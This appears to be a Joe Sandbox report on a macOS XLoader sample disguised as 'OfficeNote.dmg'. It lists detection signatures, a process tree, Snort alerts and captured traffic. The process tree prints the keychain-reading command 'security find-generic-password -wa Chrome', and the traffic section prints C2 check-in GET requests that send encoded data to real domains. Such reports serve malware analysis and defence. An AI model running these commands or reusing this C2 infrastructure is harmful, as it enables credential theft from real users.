Loading Joe Sandbox Report ...

Edit tour

macOS Analysis Report
OfficeNote.dmg

Overview

General Information

Sample Name:OfficeNote.dmg
Analysis ID:3305820
MD5:8f8444dc9486a7f770c34b6d7cb67c05
SHA1:5946452d1537cf2a0e28c77fa278554ce631223c
SHA256:453e155722ac23771d63418e39f88430b0a922bd5f4afa81dcc73db44571b79e
Infos:

Detection

XLoader
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Searches for passwords in macOS's keychain
Snort IDS alert for network traffic
Yara detected XLoader
Writes Mach-O files to hidden directories
Accesses directories and/or files with sensitive browser data likely for credential stealing
Executes the "security" command used to access the keychain
Contains symbols with suspicious names likely related to anti-analysis
Executes hidden files
Creates memory-persistent launch services
Creates user-wide 'launchd' managed services aka launch agents
HTTP GET or POST without a user agent
Creates hidden files, links and/or directories
Mach-O contains sections with high entropy indicating compressed/encrypted content
Executes commands using a shell command-line interpreter
Writes 64-bit Mach-O files to disk
Creates application bundles
Executes the "rm" command used to delete files or directories

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox Version:
Analysis ID:3305820
Start date and time:2023-08-23 14:51:42 +02:00
Joe Sandbox Product:Cloud
Overall analysis duration:0h 8m 18s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, Apple Silicon ARM64, Ventura
macOS major version:13
CPU architecture:arm64
Analysis Mode:default
Sample file name:OfficeNote.dmg
Detection:MAL
Classification:mal84.troj.spyw.evad.macDMG@0/7@46/0
  • Excluded IPs from analysis (whitelisted): 2.21.20.142, 2.21.20.146, 2.21.20.144, 2.21.20.141, 2.21.20.147, 2.21.20.139, 2.21.20.143, 2.21.20.140, 2.21.20.145, 192.229.221.95, 23.50.131.209, 23.50.131.205, 23.35.236.24, 23.206.208.134
  • Excluded domains from analysis (whitelisted): iadsdk.apple.com.edgekey.net, e673.dsce9.akamaiedge.net, a2047.dscapi9.akamai.net, stocks-data-service.apple.com, a1091.dscw154.akamai.net, weather-data.apple.com.akadns.net, iadsdk.apple.com, ocsp.digicert.com, weather-data.apple.com.akamaized.net, weather-data.apple.com, ocsp.edge.digicert.com, stocks-data-service.lb-apple.com.akadns.net, e4805.dsca.akamaiedge.net, stocks-data-service.apple.com.edgesuite.net, iadsdk.apple.com.akadns.net
Command:open "/Volumes/OfficeNote/OfficeNote.app"
PID:1004
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • System is mac-arm-ventura
  • open (MD5: ef617087070a1fd1b01573fd9668328c) Arguments: /usr/bin/open /Volumes/OfficeNote/OfficeNote.app
  • launchd New Fork (PID: 1005, Parent: 1)
  • xpcproxy (MD5: ec5cba9702c028c784fa75e8214bc95e) Arguments: xpcproxy application.OfficeNote.19.25
  • OfficeNote (MD5: 42f942691bec23b60dcd5a587a2ec43f) Arguments: /Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote
    • sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c /Users/rodrigo/73a470tO
    • bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c /Users/rodrigo/73a470tO
    • 73a470tO (MD5: c68e9ab57bff9de72414c83d612636dc) Arguments: /Users/rodrigo/73a470tO
      • 73a470tO New Fork (PID: 1010, Parent: 1007)
      • sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
      • bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
      • wvz4oTFps (MD5: c68e9ab57bff9de72414c83d612636dc) Arguments: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
      • wvz4oTFps (MD5: c68e9ab57bff9de72414c83d612636dc) Arguments: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
        • sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c security find-generic-password -wa 'Chrome'
        • bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c security find-generic-password -wa 'Chrome'
        • security (MD5: 05bb69f46a91f9b057f2e279de6a9435) Arguments: security find-generic-password -wa Chrome
        • sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c rm /Users/rodrigo/obdL0Dl8
        • bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c rm /Users/rodrigo/obdL0Dl8
        • rm (MD5: dba08d0ccaff1fa37865ef9a1c8ed34d) Arguments: rm /Users/rodrigo/obdL0Dl8
  • cleanup
SourceRuleDescriptionAuthorStrings
/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFpsJoeSecurity_XLoaderYara detected XLoaderJoe Security
    /Users/rodrigo/73a470tOJoeSecurity_XLoaderYara detected XLoaderJoe Security
      Timestamp:192.168.0.56192.0.78.2549173802031412 08/23/23-14:54:30.991426
      SID:2031412
      Source Port:49173
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56192.0.78.2549167802031412 08/23/23-14:52:59.880394
      SID:2031412
      Source Port:49167
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56137.220.225.5449182802031412 08/23/23-14:55:48.955698
      SID:2031412
      Source Port:49182
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56146.148.179.23149169802031412 08/23/23-14:53:20.544201
      SID:2031412
      Source Port:49169
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.5634.102.136.18049175802031412 08/23/23-14:54:55.545868
      SID:2031412
      Source Port:49175
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56192.0.78.2549184802031412 08/23/23-14:56:13.017651
      SID:2031412
      Source Port:49184
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.260999532047696 08/23/23-14:52:49.208493
      SID:2047696
      Source Port:60999
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.157563532047686 08/23/23-14:55:06.724095
      SID:2047686
      Source Port:57563
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56104.21.26.18249177802031412 08/23/23-14:55:06.782645
      SID:2031412
      Source Port:49177
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.257483532047695 08/23/23-14:52:34.627928
      SID:2047695
      Source Port:57483
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.163416532047696 08/23/23-14:52:48.789953
      SID:2047696
      Source Port:63416
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.5666.29.151.12149165802031412 08/23/23-14:52:20.486977
      SID:2031412
      Source Port:49165
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.5666.29.151.12149180802031412 08/23/23-14:55:37.109666
      SID:2031412
      Source Port:49180
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.164276532047693 08/23/23-14:54:44.293405
      SID:2047693
      Source Port:64276
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.257571532047696 08/23/23-14:56:02.353133
      SID:2047696
      Source Port:57571
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56146.148.179.23149188802031412 08/23/23-14:56:33.382881
      SID:2031412
      Source Port:49188
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56137.220.225.5449166802031412 08/23/23-14:52:35.399112
      SID:2031412
      Source Port:49166
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56188.114.96.349168802031412 08/23/23-14:53:10.078120
      SID:2031412
      Source Port:49168
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56188.114.96.349186802031412 08/23/23-14:56:23.049901
      SID:2031412
      Source Port:49186
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56172.67.200.5049179802031412 08/23/23-14:55:16.860596
      SID:2031412
      Source Port:49179
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.154348532047691 08/23/23-14:53:10.036329
      SID:2047691
      Source Port:54348
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.155180532047697 08/23/23-14:52:20.278710
      SID:2047697
      Source Port:55180
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56104.21.71.14949190802031412 08/23/23-14:57:11.019298
      SID:2031412
      Source Port:49190
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56104.21.71.14949170802031412 08/23/23-14:53:59.333245
      SID:2031412
      Source Port:49170
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.255184532047693 08/23/23-14:54:42.194250
      SID:2047693
      Source Port:55184
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.56185.215.4.5749171802031412 08/23/23-14:54:09.796497
      SID:2031412
      Source Port:49171
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.164207532047696 08/23/23-14:56:02.979015
      SID:2047696
      Source Port:64207
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.0.564.2.2.154298532047695 08/23/23-14:52:32.525567
      SID:2047695
      Source Port:54298
      Destination Port:53
      Protocol:UDP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Yara matchFile source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps, type: DROPPED
      Source: Yara matchFile source: /Users/rodrigo/73a470tO, type: DROPPED

      Networking

      barindex
      Source: TrafficSnort IDS: 2047697 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .growind .info) 192.168.0.56:55180 -> 4.2.2.1:53
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49165 -> 66.29.151.121:80
      Source: TrafficSnort IDS: 2047695 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .qq9122 .com) 192.168.0.56:54298 -> 4.2.2.1:53
      Source: TrafficSnort IDS: 2047695 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .qq9122 .com) 192.168.0.56:57483 -> 4.2.2.2:53
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49166 -> 137.220.225.54:80
      Source: TrafficSnort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:60999 -> 4.2.2.2:53
      Source: TrafficSnort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:63416 -> 4.2.2.1:53
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49167 -> 192.0.78.25:80
      Source: TrafficSnort IDS: 2047691 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .spv88 .online) 192.168.0.56:54348 -> 4.2.2.1:53
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49168 -> 188.114.96.3:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49169 -> 146.148.179.231:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49170 -> 104.21.71.149:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49171 -> 185.215.4.57:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49173 -> 192.0.78.25:80
      Source: TrafficSnort IDS: 2047693 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .activ-ketodietakjsy620 .cloud) 192.168.0.56:55184 -> 4.2.2.2:53
      Source: TrafficSnort IDS: 2047693 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .activ-ketodietakjsy620 .cloud) 192.168.0.56:64276 -> 4.2.2.1:53
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49175 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2047686 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .brioche-amsterdam .com) 192.168.0.56:57563 -> 4.2.2.1:53
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49177 -> 104.21.26.182:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49179 -> 172.67.200.50:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49180 -> 66.29.151.121:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49182 -> 137.220.225.54:80
      Source: TrafficSnort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:64207 -> 4.2.2.1:53
      Source: TrafficSnort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:57571 -> 4.2.2.2:53
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49184 -> 192.0.78.25:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49186 -> 188.114.96.3:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49188 -> 146.148.179.231:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49190 -> 104.21.71.149:80
      Source: global trafficHTTP traffic detected: GET /e8gp/?xhc0L2=61qgLCVmwiYhY1k2gwUpsEeOxq+LhUlbpqnlW+J5fZEqilNytgGabqEunmU6yZQuNKMgwmW03tX/qZ3Mu/pSbEMh+Akeuw6b40Ne&HDp=njTTUjRhh2_ HTTP/1.1Host: www.growind.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvA9&HDp=njTTUjRhh2_ HTTP/1.1Host: www.qq9122.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /e8gp/?xhc0L2=7ohy4xQNzEvyJOUXqQIxQK/6m66/e2xRAEQtQV87DDNIcHu63YMrZBFkAKfGBEVRxo3xV5Yf4dXQnrjI8dL8Qf9nzSQEAzsJ3BGl&HDp=njTTUjRhh2_ HTTP/1.1Host: www.dalilamendezgallery.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /e8gp/?xhc0L2=6eBq3For9zap+5OTHjEdFb+cgnEpiUG6j5oni2dGM+5uq+KZcTGOclOU9yeLFqZHdTK7cjefMM3qdKtOujwsYhywHZZM/a68NQMe&HDp=njTTUjRhh2_ HTTP/1.1Host: www.spv88.onlineConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /e8gp/?xhc0L2=xGycCDLXwFlD+OnV5wrRAoWjiweuMz9Ju1yK0Of5U14HoqAK3y5ZJ513OPQC3HV1XCE6HQHGmC1hedXCJaVT5rHtWdIcIJC/itwx&HDp=njTTUjRhh2_ HTTP/1.1Host: www.kuailesms.netConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /e8gp/?xhc0L2=xGycCDLXwFlD+OnV5wrRAoWjiweuMz9Ju1yK0Of5U14HoqAK3y5ZJ513OPQC3HV1XCE6HQHGmC1hedXCJaVT5rHtWdIcIJC/itwx&HDp=njTTUjRhh2_ HTTP/1.1Host: www.kuailesms.netConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /e8gp/?xhc0L2=Pv2HIUgDB7Qa+wzzBoxyDE7uYtzxjTUpRgqcrt0uAAtucffTC6N1FqpKGtHQdbXZZnJrDGurKZENAMbphLYijutqjr515/wKHFYo&HDp=njTTUjRhh2_ HTTP/1.1Host: www.xc3e3.funConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /e8gp/?xhc0L2=1Opkd6I8Hw0hqQTwYPZT5403YNS0Jo6p5aB/dYESwIKFU9GO+2rSmzXSuAC0uGbmcK86ZqWa9QkknXVi4rO7fYkC/qyHgn6fvkxK&HDp=njTTUjRhh2_ HTTP/1.1Host: www.mixova.artConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /e8gp/?xhc0L